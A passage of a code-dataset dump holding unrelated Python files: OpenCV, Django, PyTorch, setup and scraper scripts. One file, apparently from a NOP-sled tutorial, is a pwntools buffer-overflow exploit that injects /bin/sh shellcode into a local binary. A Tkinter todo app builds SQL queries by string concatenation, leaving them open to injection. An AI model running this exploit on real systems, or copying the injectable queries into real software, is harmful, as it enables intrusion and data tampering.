appprox roots: \", x1, \" \", x2)\n\nprint(\"True roots: \", x1_true, \" \", x2_true)","sub_path":"chapra_7th/ch03/chapra_example_3_8.py","file_name":"chapra_example_3_8.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"55159427","text":"#import necsessary files\r\nimport numpy as np \r\nimport cv2\r\n#read the image using imread command\r\nimg=cv2.imread('CKOFy3m.jpg',1)\r\n\r\n#convert color image to gray\r\nimg2gray=cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n#apply threshold\r\nret, mask= cv2.threshold(img,220,255,cv2.THRESH_BINARY)\r\n#display image\r\ncv2.imshow('charizard',mask)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"char.py","file_name":"char.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
+{"seq_id":"179727037","text":"#!/usr/local/bin/python2.7\n\"\"\"\nViews module manage interface between user and openstack-lease-it.\n\nlease_it.views provide interaction based on REST good practice.\n\"\"\"\nimport ast\n\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\n\nfrom lease_it import backend\nfrom lease_it.backend import Exceptions as bckExceptions # pylint: disable=ungrouped-imports\nfrom lease_it.datastore.ModelAccess import InstancesAccess\nfrom lease_it.datastore.Exceptions import StillRunning\n\nfrom openstack_lease_it.settings import GLOBAL_CONFIG, LOGGER\nfrom openstack_lease_it.decorators import superuser_required\n\n# We load backend specify by configuration file\nBACKEND_PLUGIN = getattr(backend, \"{0}Connection\".format(GLOBAL_CONFIG['BACKEND_PLUGIN']))\nBACKEND = BACKEND_PLUGIN() # pylint: disable=not-callable\n\n\n@login_required\ndef dashboard(request):\n \"\"\"\n The default dashboard\n\n :param request: Web request\n :return: HTML Rendering\n \"\"\"\n return render(request, 'dashboard/dashboard.html')\n\n\n@login_required\ndef flavors(request): # pylint: disable=unused-argument\n \"\"\"\n View for flavors request\n\n :param request: Web request\n :return: JsonResponse w/ list of flavor and details values\n \"\"\"\n # We call our method\n response = BACKEND.flavors()\n return JsonResponse(response)\n\n\n@login_required\ndef instances(request): #pylint: disable=unused-argument\n \"\"\"\n View for instances list\n\n :param request: Web request\n :return: JsonResponse w/ list of instances and details\n \"\"\"\n response = list()\n # Retrieve filtered parameter on GET. It's used to display all instances or just user instances\n # In all cases, if user is not superuser, only user instances are displayed\n if 'filtered' in request.GET:\n filtered = ast.literal_eval(request.GET['filtered'])\n else:\n # By default, we filter based on user_id\n filtered = True\n # By default, we just list user instances, not all instances\n if not request.user.is_superuser:\n # If user is superuser and user are requesting admin view of instances\n # We ask a full list of instances\n filtered = True\n\n # We retrieve data from backend\n data_instances = BACKEND.instances(request, filtered)\n data_users = BACKEND.users()\n data_projects = BACKEND.projects()\n\n # We merge user and project information w/ instances\n for data_instance in data_instances:\n try:\n project = \"{name}\".format(\n **data_projects[data_instances[data_instance]['project_id']])\n except KeyError:\n project = data_instances[data_instance]['project_id']\n\n try:\n user = \"{name}\".format(\n **data_users[data_instances[data_instance]['user_id']])\n except KeyError:\n user = data_instances[data_instance]['user_id']\n response.append({\n 'id': data_instances[data_instance]['id'],\n 'name': data_instances[data_instance]['name'],\n 'created_at': data_instances[data_instance]['created_at'],\n 'lease_end': data_instances[data_instance]['lease_end'],\n 'project': project,\n 'user': user\n })\n return JsonResponse(response, safe=False)\n\n\n@login_required\ndef instance(request, instance_id):\n \"\"\"\n This is view used to for a new lease on a specific instance (http://url/instances/instance_id)\n a PermissionDenied exception is raised decided by backend. 
Mainly if instance is not owned by\n user but see Backend comment.\n\n :param request: Web request\n :param instance_id: retrieve from url\n :return: JsonResponse\n \"\"\"\n response = {\n 'status': 'success'\n }\n try:\n instance_info = BACKEND.lease_instance(request, instance_id)\n response['instance'] = instance_info\n except bckExceptions.PermissionDenied as error:\n LOGGER.info(\"Permission Denied to lease %s\", instance_id)\n response = {\n 'status': 'error',\n 'message': error.message\n }\n return JsonResponse(response)\n\n\n@superuser_required\ndef users(request): # pylint: disable=unused-argument\n \"\"\"\n View for users\n\n :param request: Web request\n :return: JsonResponse w/ list of users and details\n \"\"\"\n response = BACKEND.users()\n return JsonResponse(response)\n\n\n@superuser_required\ndef databases(request): # pylint: disable=unused-argument\n \"\"\"\n View for all entries on database, used to delete old instances data\n\n :param request: Web request\n :return: JSonResponse w/ list of database entries\n \"\"\"\n response = InstancesAccess.get_all()\n # By default, JsonResponse refuse to serialize a list to a Json list. safe=False allow it.\n return JsonResponse(response, safe=False)\n\n\n@superuser_required\ndef database(request, instance_id): # pylint: disable=unused-argument\n \"\"\"\n This view is used to delete instance from database\n\n :param request: Web request\n :param instance_id: instance id\n :return: JSonResponse w/ status of deletion\n \"\"\"\n response = {\n 'status': 'success',\n 'instance': {'id': instance_id}\n }\n try:\n InstancesAccess.delete(instance_id)\n except StillRunning as error:\n response = {\n 'status': 'failed',\n 'message': error.message\n }\n return JsonResponse(response)\n","sub_path":"openstack_lease_it/lease_it/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"455063434","text":"import scipy.misc\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\ndef resize_img(image, out_name):\n\timg_arr = scipy.misc.imread(image)\n\trs_img_arr = scipy.misc.imresize(img_arr, (300, 400))\n\trs_img = Image.fromarray(rs_img_arr, 'RGB')\n\trs_img.show()\n\trs_img.save(out_name)\n\n#resize_img('image/monet.jpg', 'image/style.jpg')\nresize_img('image/kusamayayoi.jpg', 'image/style_kusamayayoi.jpg')\n#resize_img('image/turtle.jpg', 'image/content_test.jpg')\n","sub_path":"image_resize.py","file_name":"image_resize.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"77560294","text":"#-*-coding:utf-8 -*-\n\"\"\"\n 21. Merge Two Sorted Lists\n Directed by user zhongch4g\n current system date 2017/5/3\n\"\"\"\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n newList = ListNode(0)\n relist = newList\n while l1 is not None and l2 is not None:\n if l1.val > l2.val:\n newList.next = l2\n l2 = l2.next\n newList = newList.next\n else:\n newList.next = l1\n l1 = l1.next\n newList = newList.next\n if not l1:\n newList.next = l2\n return relist.next\n if not l2:\n newList.next = l1\n return relist.next","sub_path":"LeetCode/21. Merge Two Sorted Lists.py","file_name":"21. 
Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"160950538","text":"from setuptools import setup, find_packages\nimport io\n\nwith io.open('terminado/__init__.py', encoding='utf-8') as fid:\n for line in fid:\n if line.startswith('__version__'):\n version = line.strip().split()[-1][1:-1]\n break\n\n\nsetup_args = dict(\n name = \"terminado\",\n version = version,\n author = \"Jupyter Development Team\",\n author_email = \"jupyter@googlegroups.com\",\n url = \"https://github.com/jupyter/terminado\",\n packages = find_packages(),\n include_package_data = True,\n description = \"Tornado websocket backend for the Xterm.js Javascript terminal emulator library.\",\n long_description = open(\"README.rst\").read(),\n long_description_content_type=\"text/x-rst\",\n install_requires = [\n \"ptyprocess;os_name!='nt'\",\n \"pywinpty (>=1.1.0);os_name=='nt'\",\n \"tornado (>=4)\",\n ],\n extras_require = dict(test=['pytest']),\n python_requires=\">=3.6\",\n classifiers=[\n \"Environment :: Web Environment\",\n \"License :: OSI Approved :: BSD License\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Terminals :: Terminal Emulators/X Terminals\",\n ]\n)\n\n\nif __name__ == '__main__':\n setup(**setup_args)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"483267247","text":"import os\nimport torch\nimport logging\nimport torch.nn as nn\nimport numpy as np\nfrom convlab2.util.train_util import to_device\nimport torch.nn as nn\nfrom torch import optim\n\nimport zipfile\nimport sys\nimport matplotlib.pyplot as plt\nimport pickle\n\nclass Reward_predict(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(Reward_predict, self).__init__()\n self.encoder_1 = nn.LSTM(input_size, output_size, batch_first=True, bidirectional=False)\n self.encoder_2 = nn.LSTM(output_size, output_size)\n\n self.m = nn.Sigmoid()\n self.loss = nn.BCELoss(size_average= False,reduce= True)\n self.cnn_belief = nn.Linear(input_size-output_size,output_size)\n self.cnn_output = nn.Linear(output_size,output_size)\n\n def forward(self, input_feature, input_belief, target):\n \"\"\"\n :param input_feature: 549\n :param input_belief: 340\n :param target: 209\n :return:\n \"\"\"\n # to construct the batch first, then we could compute the loss function for this stuff, simple and easy.\n _, (last_hidden, last_cell) = self.encoder_1(input_feature)\n # second Part\n\n _, (predict_action, last_cell) = self.encoder_2(self.cnn_belief(input_belief), (last_hidden, last_cell))\n\n loss = self.loss(self.m(self.cnn_output(predict_action)),target)\n return loss\n\n def compute_reward(self, input_feature, input_belief, input_predict_RL):\n # compute the reward based on the very easy methocd: product of two vectors\n _, (last_hidden, last_cell) = self.encoder_1(input_feature)\n # second Part\n _, (predict_action, last_cell) = self.encoder_2(self.cnn_belief(input_belief), (last_hidden, last_cell))\n action_prob = self.m(self.cnn_output(predict_action))\n reward = action_prob.unsqueeze(0) * input_predict_RL.unsqueeze(0)\n res = torch.sum(reward.unsqueeze(0).unsqueeze(0))\n return res\n\n def bellman_equation(self,r, mask, gamma):\n \"\"\"\n we save a trajectory in continuous space and it reaches the ending of current 
trajectory when mask=0.\n :param r: reward, Tensor, [b]\n :param mask: indicates ending for 0 otherwise 1, Tensor, [b]\n :return: V-target(s), Tensor\n \"\"\"\n batchsz = r.size(0)\n\n # v_target is worked out by Bellman equation.\n v_target = torch.Tensor(batchsz)\n\n prev_v_target = 0\n for t in reversed(range(batchsz)):\n # mask here indicates a end of trajectory\n # this value will be treated as the target value of value network.\n # mask = 0 means the immediate reward is the real V(s) since it's end of trajectory.\n # formula: V(s_t) = r_t + gamma * V(s_t+1)\n v_target[t] = r[t] + gamma * prev_v_target * mask[t]\n # update previous\n prev_v_target = v_target[t]\n\n return v_target","sub_path":"convlab2/policy/mle/idea2_predict_next_action.py","file_name":"idea2_predict_next_action.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"178371625","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /media/storage/eyes/virtualenv/pyte/lib/python3.5/site-packages/pyte/util.py\n# Compiled at: 2016-04-20 01:32:41\n# Size of source mod 2**32: 2533 bytes\n\"\"\"\nMiscellaneous utilities.\n\"\"\"\nimport collections, dis, sys\nfrom . import tokens\nimport pyte\n\ndef generate_simple_call(opcode, index):\n bs = b''\n bs += opcode.to_bytes(1, byteorder='little')\n if isinstance(index, int):\n bs += index.to_bytes(2, byteorder='little')\n else:\n bs += index\n return bs\n\n\ndef generate_bytecode_from_obb(obb: object, previous: bytes) -> bytes:\n if isinstance(obb, pyte.superclasses._PyteOp):\n return obb.to_bytes(previous)\n if isinstance(obb, (pyte.superclasses._PyteAugmentedComparator,\n pyte.superclasses._PyteAugmentedValidator._FakeMathematicalOP)):\n return obb.to_bytes(previous)\n if isinstance(obb, pyte.superclasses._PyteAugmentedValidator):\n obb.validate()\n return obb.to_load()\n if isinstance(obb, int):\n return obb.to_bytes((obb.bit_length() + 7) // 8, byteorder='little') or b''\n if isinstance(obb, bytes):\n return obb\n raise TypeError('`{}` was not a valid bytecode-encodable item'.format(obb))\n\n\ndef generate_load_global(index) -> bytes:\n return generate_simple_call(tokens.LOAD_GLOBAL, index)\n\n\ndef generate_load_fast(index) -> bytes:\n \"\"\"\n Generates a LOAD_FAST operation.\n \"\"\"\n return generate_simple_call(tokens.LOAD_FAST, index)\n\n\ndef generate_load_const(index) -> bytes:\n return generate_simple_call(tokens.LOAD_CONST, index)\n\n\ndef flatten(l):\n for el in l:\n if isinstance(el, collections.Iterable) and not isinstance(el, (str, bytes)):\n for sub in flatten(el):\n yield sub\n\n else:\n yield el\n\n\ndef _get_name_info(name_index, name_list):\n \"\"\"Helper to get optional details about named references\n\n Returns the dereferenced name as both value and repr if the name\n list is defined.\n Otherwise returns the name index and its repr().\n \"\"\"\n argval = name_index\n if name_list is not None:\n try:\n argval = name_list[name_index]\n except IndexError:\n return ('(unknown)', '(unknown)')\n\n argrepr = argval\n else:\n argrepr = repr(argval)\n return (\n argval, argrepr)\n\n\ndis._get_name_info = _get_name_info\nif sys.version_info[0:2] < (3, 4):\n from pyte import backports\n 
backports.apply()","sub_path":"pycfiles/pytec-1.0.0.linux-x86_64.tar/util.cpython-35.py","file_name":"util.cpython-35.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"518659740","text":"from lxml import etree\nimport requests\n\n\nclass TuKu(object):#初始化\n #模拟浏览器来访问\n def __init__(self):\n self.header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.15 Safari/537.36'}\n self.start_url = \"http://tu.duowan.com/tu?offset={}\"\n self.url = []\n for i in range(10):\n url = self.start_url.format(i * 30)\n self.url.append(url)\n\n def get_xpath(self,url):#进行解析xpath\n ret = requests.get(url,self.header)\n html = etree.HTML(ret.content)\n html_content = html.xpath(\"//ul[@id='pic-list']/li/a/img/@src\")\n for html_pic in html_content:\n with open(\"png/{}\".format(html_pic[-10:]),'ab') as fp:\n ret = requests.get(html_pic)\n fp.write(ret.content)\n\n def run(self):\n for url in self.url:\n self.get_xpath(url)\n\nif __name__==\"__main__\":\n\n\n tuku = TuKu()\n tuku.run()\n","sub_path":"PycharmProjects/PythonCodes/07-爬虫/练习/爬取数据-图片.py","file_name":"爬取数据-图片.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"503424710","text":"from django.shortcuts import render, HttpResponse\nfrom django.views.generic.base import View\nfrom pure_pagination import Paginator, PageNotAnInteger\nfrom django.contrib.auth.mixins import LoginRequiredMixin # 让页面需要登陆才能看到\nfrom django.db.models import Q\n\nfrom apps.courses.models import Course, Lesson, Video, CourseResource\nfrom apps.operations.models import UserCourses, CourseComment\n\n\nclass CourseListView(View):\n def get(self, request, *args, **kwargs):\n # 从数据库中获取数据\n all_courses = Course.objects.order_by(\"-c_time\")\n courses_nums = Course.objects.all().count()\n\n # 对课程机构数据进行分页\n # 如果没有页面,则显示一页\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n\n # 每页显示的记录条数\n p = Paginator(all_courses, per_page=5, request=request)\n courses = p.page(page)\n\n return render(request, \"course_list.html\", {\n \"all_courses\": courses,\n \"courses_nums\": courses_nums,\n })\n\n\nclass CourseDetailView(View):\n def get(self, request, course_id, *args, **kwargs):\n # 从数据库中获取数据\n course = Course.objects.get(id=int(course_id))\n course.save()\n\n user_course = UserCourses.objects.filter(course=course, user=request.user)\n if user_course:\n course = Course.objects.get(id=int(course_id))\n course_resources = CourseResource.objects.filter(course=course)\n\n return render(request, \"course_lesson.html\", {\n \"course\": course,\n \"course_resources\": course_resources,\n })\n\n if not user_course:\n user_course = UserCourses(user=request.user, course=course)\n user_course.save()\n\n course.student_nums += 1\n course.save()\n\n return render(request, \"course_detail.html\", {\n \"course\": course,\n })\n\n\nclass CourseVideoView(LoginRequiredMixin, View):\n login_url = \"/login/\"\n\n def get(self, request, course_id, video_id, *args, **kwargs):\n \"\"\"\n 获取课程章节信息\n \"\"\"\n\n course = Course.objects.get(id=int(course_id))\n\n video = Video.objects.get(id=int(video_id))\n\n # 查询用户是否已经关联了该课程\n user_courses = UserCourses.objects.filter(user=request.user, course=course)\n if not user_courses:\n user_course = UserCourses(user=request.user, course=course)\n user_course.save()\n\n course.student_nums += 
1\n course.save()\n\n course_resources = CourseResource.objects.filter(course=course)\n\n return render(request, \"course_play.html\", {\n \"course\": course,\n \"course_resources\": course_resources,\n \"video\": video,\n })\n\n\nclass CourseCommentsView(LoginRequiredMixin, View):\n login_url = \"/login/\"\n\n def get(self, request, course_id, *args, **kwargs):\n course = Course.objects.get(id=int(course_id))\n comments = CourseComment.objects.filter(course=course).order_by(\"-c_time\")\n\n # 查询用户是否已经关联了该课程\n user_courses = UserCourses.objects.filter(user=request.user, course=course)\n if not user_courses:\n user_course = UserCourses(user=request.user, course=course)\n user_course.save()\n\n course.student_nums += 1\n course.save()\n\n course_resources = CourseResource.objects.filter(course=course)\n\n return render(request, \"course_comment.html\", {\n \"course\": course,\n \"course_resources\": course_resources,\n \"comments\": comments\n })\n\n\nclass CourseLessonView(LoginRequiredMixin, View):\n login_url = '/login/'\n\n def get(self, request, course_id, *args, **kwargs):\n # 从数据库中获取数据\n course = Course.objects.get(id=int(course_id))\n course.click_nums += 1\n course.save()\n # 1. 用户和课程之间的关联\n # 2. 对view进行login登录的验证\n # 3. 其他课程\n\n # 查询用户是否已经关联了该课程\n user_courses = UserCourses.objects.filter(user=request.user, course=course)\n if not user_courses:\n user_course = UserCourses(user=request.user, course=course)\n user_course.save()\n\n course.student_nums += 1\n course.save()\n\n course_resources = CourseResource.objects.filter(course=course)\n\n return render(request, \"course_lesson.html\", {\n \"course\": course,\n \"course_resources\": course_resources,\n })\n\n\nclass DeleteCourseView(LoginRequiredMixin, View):\n login_url = '/login/'\n\n def get(self, request, course_id, *args, **kwargs):\n # 从数据库中获取数据\n course = Course.objects.filter(id=int(course_id))\n user_course = UserCourses.objects.filter(user_id=request.user.id, course=course_id)\n user_course.delete()\n\n my_courses = UserCourses.objects.filter(user=request.user)\n return render(request, \"user_courses.html\", {\n # \"my_courses\":my_courses,\n \"my_courses\": my_courses\n })\n","sub_path":"zkonline/apps/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"456980127","text":"\"\"\"\nhttps://www.careercup.com/question?id=16759664\n\nYou have k lists of sorted integers. 
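Aside on the Django views above: every enrollment block repeats the same filter / create-if-missing / bump-student_nums dance. Django's built-in get_or_create covers exactly that pattern; a sketch assuming the same UserCourses and Course models (illustration only, not part of the original app):

from apps.operations.models import UserCourses

def enroll(user, course):
    # get_or_create returns (instance, created); created is True only on first enrollment
    user_course, created = UserCourses.objects.get_or_create(user=user, course=course)
    if created:
        course.student_nums += 1
        course.save()
    return user_course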
Find the smallest range that includes at least one number from each of the k lists.\n\nFor example,\nList 1: [4, 10, 15, 24, 26]\nList 2: [0, 9, 12, 20]\nList 3: [5, 18, 22, 30]\n\nThe smallest range here would be [20, 24] as it contains 24 from list 1, 20 from list 2, and 22 from list 3.\n\n\n\"\"\"\n\nimport heapq\n\n\ndef smallest_range_in_K_lists(sequences):\n min_heap = []\n num_elements = 0\n for i, numbers in enumerate(sequences):\n min_heap.append((numbers[0], i, 0))\n num_elements += len(numbers)\n\n heapq.heapify(min_heap)\n left_bound, right_bound = min(min_heap)[0], max(min_heap)[0]\n for _ in range(num_elements):\n cur_left, cur_right = min(min_heap)[0], max(min_heap)[0]\n current_range = cur_right - cur_left\n\n if right_bound - left_bound > current_range:\n right_bound, left_bound = cur_right, cur_left\n\n _, i, j = heapq.heappop(min_heap)\n\n if j + 1 >= len(sequences[i]):\n break\n\n heapq.heappush(min_heap, (sequences[i][j + 1], i, j + 1))\n\n return [left_bound, right_bound]\n\n\nif __name__ == '__main__':\n sequences = [[4, 10, 15, 24, 26],\n [0, 9, 12, 20],\n [5, 18, 22, 30]]\n\n print(smallest_range_in_K_lists(sequences))\n\n","sub_path":"Problems/companies/Google/Interviews/Onsite interview/Find smallest range in K sorted lists.py","file_name":"Find smallest range in K sorted lists.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"180101969","text":"import dork_compose.plugin\nfrom compose.cli.docker_client import docker_client\nfrom dork_compose.helpers import notdefault, tru\nimport os\nimport glob\nimport urlparse\nimport pkg_resources\n\n\nclass Plugin(dork_compose.plugin.Plugin):\n\n def __init__(self, env, name):\n dork_compose.plugin.Plugin.__init__(self, env, name)\n self.auth = self.collect_auth_files()\n\n def environment(self):\n return {\n 'DOCKER_SOCK': self.docker_sock,\n 'DORK_PROXY_AUTH_DIR': self.auth_dir,\n 'DORK_PROXY_CERTS_DIR': self.auth_dir,\n }\n\n @property\n def auxiliary_project(self):\n return pkg_resources.resource_filename('dork_compose', 'auxiliary/proxy')\n\n def service_domain(self, service=None):\n return '--'.join(filter(tru, [\n service,\n notdefault(self.project),\n notdefault(self.instance)\n ])) + '.' 
+ self.proxy_domain\n\n def info(self, project):\n info = {}\n auth = self.collect_auth_files()\n for service in project.services:\n if 'environment' in service.options and 'VIRTUAL_HOST' in service.options['environment']:\n key = '\"%s\" url' % service.name\n info[key] = service.options['environment'].get('VIRTUAL_PROTO', 'http') + '://' + service.options['environment']['VIRTUAL_HOST']\n if '.auth' in auth or '.auth.%s' % service.name in auth:\n info[key] += ' (password protected)'\n return info\n\n @property\n def auth_dir(self):\n return os.path.expanduser(self.env.get('DORK_PROXY_AUTH_DIR', '%s/auth' % self.datadir))\n\n @property\n def certs_dir(self):\n return os.path.expanduser(self.env.get('DORK_PROXY_AUTH_DIR', '%s/certs' % self.datadir))\n\n @property\n def docker_sock(self):\n result = urlparse.urlparse(self.env.get('DOCKER_HOST', 'unix:///var/run/docker.sock'))\n if result.scheme != 'unix':\n raise EnvironmentError('Dork proxy works with docker socket api only.')\n return result.path\n\n @property\n def proxy_domain(self):\n return self.env.get('DORK_PROXY_DOMAIN', '127.0.0.1.xip.io')\n\n def reload_proxy(self):\n client = docker_client(self.env)\n containers = client.containers(all=True, filters={\n 'label': 'org.iamdork.proxy'\n })\n\n for container in containers:\n ex = client.exec_create(container, 'nginx -s reload')\n client.exec_start(ex)\n\n def preprocess_config(self, config):\n for service in config.services:\n if 'ports' in service:\n for index, port in enumerate(service['ports']):\n if isinstance(port, basestring):\n (external, internal) = port.split(':')\n if external and internal:\n domain = self.service_domain() if external == '80' or external == '443' else self.service_domain(service['name'])\n if 'environment' not in service:\n service['environment'] = {}\n service['environment']['VIRTUAL_HOST'] = domain\n if 'labels' not in service:\n service['labels'] = {}\n if external == '443':\n service['environment']['VIRTUAL_PROTO'] = 'https'\n service['environment']['VIRTUAL_PORT'] = int(internal)\n del service['ports'][index]\n\n def collect_auth_files(self):\n files = {}\n path = filter(len, self.basedir.split('/'))\n current = ''\n while len(path):\n current = current + '/' + path.pop(0)\n auth = '%s/.auth' % current\n if os.path.isfile(auth):\n if '.auth' not in files:\n files['.auth'] = []\n with open(auth) as f:\n files['.auth'].append(f.read())\n for file in glob.glob('%s/.auth.*' % current):\n filename = os.path.basename(file)\n if filename not in files:\n files[filename] = []\n with open(file) as f:\n files[filename].append(f.read())\n\n return files\n\n def initializing(self, project, service_names=None):\n for service in project.get_services():\n if self.auth_dir and 'environment' in service.options and 'VIRTUAL_HOST' in service.options['environment']:\n lines = []\n if '.auth' in self.auth:\n lines.extend(self.auth['.auth'])\n if '.auth.%s' % service.name in self.auth:\n lines.extend(self.auth['.auth.%s' % service.name])\n authfile = '%s/%s' % (self.auth_dir, service.options['environment']['VIRTUAL_HOST'])\n if lines:\n with open(authfile, mode='w+') as f:\n f.writelines(lines)\n elif os.path.exists(authfile):\n os.remove(authfile)\n","sub_path":"dork_compose/plugins/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":5102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"229217722","text":"from tkinter import *\nimport sqlite3 as sql\nimport string\nimport time\n\n\nclass App:\n def 
__init__(self,master):\n def listtodo():\n db = sql.connect(\"todorecord.sqlite\")\n cursor = db.cursor()\n selecttodo = cursor.execute(\"select * from todo\")\n db.commit()\n for todo in selecttodo:\n data = todo\n todolist.insert(0, str(todo[0]) + \" - \" + str(todo[1]))\n listtodo()\n\n\nwindow = Tk()\nwindow.title(\"TODO List!\")\n\nwindow.geometry(\"405x505\")\nwindow.resizable(False,False)\n\ntodolist = Listbox(width=50, height=30)\ntodolist.grid(row=0, column=0, columnspan=2, sticky=\"we\")\n\nadd = Button(text=\"Add\", command = lambda: addfunc(addtextbox.get()))\nadd.grid(row=1, column=0, sticky=\"we\")\ndelete = Button(text=\"Delete\", command = lambda: deletefunc(todolist))\ndelete.grid(row=1, column=1, sticky=\"we\")\naddtextbox = Entry()\naddtextbox.grid(row=2, column=0,columnspan=2, sticky=\"we\")\naddtextbox.focus()\n\n\ndef listtodo():\n db = sql.connect(\"todorecord.sqlite\")\n cursor = db.cursor()\n selecttodo = cursor.execute(\"select * from todo\")\n db.commit()\n for todo in selecttodo:\n data = todo\n todolist.insert(0, str(todo[0]) + \" - \" + str(todo[1]))\n\n\ndef addfunc(i):\n todolist.delete(0, END)\n addtextbox.delete(0, 'end')\n addtextbox.focus()\n db = sql.connect(\"todorecord.sqlite\")\n cursor = db.cursor()\n if i:\n addtodo = cursor.execute(\"INSERT INTO todo (todo, date) values ('\"+i+\"','\"+str(time.time())+\"')\")\n db.commit()\n if addtodo:\n print(\"Added!\")\n else:\n print(\"Something wrong!\")\n db.close()\n listtodo()\n\ndef deletefunc(l):\n selection = l.curselection()\n if selection:\n idfirst = str(l.get(selection[0]))\n id = idfirst.split(\" \")\n todoid = id[0]\n l.delete(selection[0])\n db = sql.connect(\"todorecord.sqlite\")\n cursor = db.cursor()\n deletetodo = cursor.execute(\"delete from todo where id = '\"+todoid+\"'\")\n db.commit()\n else:\n print(\"Select an item in the list!\")\n\n\n\napp = App(window)\nmainloop()\n\n","sub_path":"todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"610980839","text":"#!/usr/bin/env python\nfrom pwn import *\n\ncontext.binary = \"./vuln\"\n\naddr = 0x7fffffffcce0 + 500\n# 0x7fffffffcdc0\noffset = 0x800\n\nio = process(\"./vuln\")\n# gdb.attach(io)\n\n# execve(\"/bin/sh\", {\"/bin/sh\", NULL}, NULL);\nprint(shellcraft.sh())\nshellcode = asm(\"NOP\") * 1500 + asm(shellcraft.sh())\nprint(len(shellcode))\n\npayload = shellcode\npayload += (offset + 8 - len(shellcode)) * b'A'\npayload += pack(addr)\n\nio.send(payload)\nio.interactive()\n\n\n\n","sub_path":"shellcodes-advanced/activities/02-tutorial-nop-sleds/src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"114157659","text":"#!/usr/bin/env python3\n#\n# Copyright 2019-2020 PSB\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport cobra\n\ngecko = 
cobra.io.read_sbml_model(\"ec_model_2019_06_25_output/iJO1366_2019_06_25_GECKO.xml\")\nanalogon = cobra.io.read_sbml_model(\"ec_model_2019_06_25_output/iJO1366_sMOMENT_2019_06_25_GECKO_ANALOGON.xml\")\n\ngecko_reactions_with_arm = []\nfor reaction in gecko.reactions:\n if \"for gene rule\" in reaction.name:\n continue\n metabolite_ids = [x.id for x in reaction.metabolites.keys() if x.id.startswith(\"im_\")]\n if len(metabolite_ids) == 1:\n gecko_reactions_with_arm.append(reaction.id.split(\"_TG_\")[0])\n\nanalogon_reactions_with_arm = []\nfor reaction in analogon.reactions:\n if \"Arm reaction\" in reaction.name:\n continue\n metabolite_ids = [x.id for x in reaction.metabolites.keys() if x.id.startswith(\"armm_\")]\n if len(metabolite_ids) == 1:\n analogon_reactions_with_arm.append(reaction.id.split(\"_GPRSPLIT\")[0])\n\ngecko_reactions_with_arm = set(gecko_reactions_with_arm)\nanalogon_reactions_with_arm = set(analogon_reactions_with_arm)\n\nprint(\"===STRUCTURAL COMPARISON OF ORIGINAL GECKO AND SMOMENT-BASED GECKO-ANALOGOUS MODEL===\")\nprint(\"Number of arm reactions - original GECKO:\", len(gecko_reactions_with_arm))\nprint(\"Number of arm reactions - sMOMENT GECKO analogon:\", len(analogon_reactions_with_arm))\ndifference = analogon_reactions_with_arm - gecko_reactions_with_arm\nprint(\"---\")\nprint(\"Number of reactions - original GECKO: \", len(gecko.reactions))\nprint(\"Number of reactions - sMOMENT GECKO analogon: \", len(analogon.reactions))\nprint(\"---\")\nprint(\"Number of metabolites - original GECKO: \", len(gecko.metabolites))\nprint(\"Number of metabolites - sMOMENT GECKO 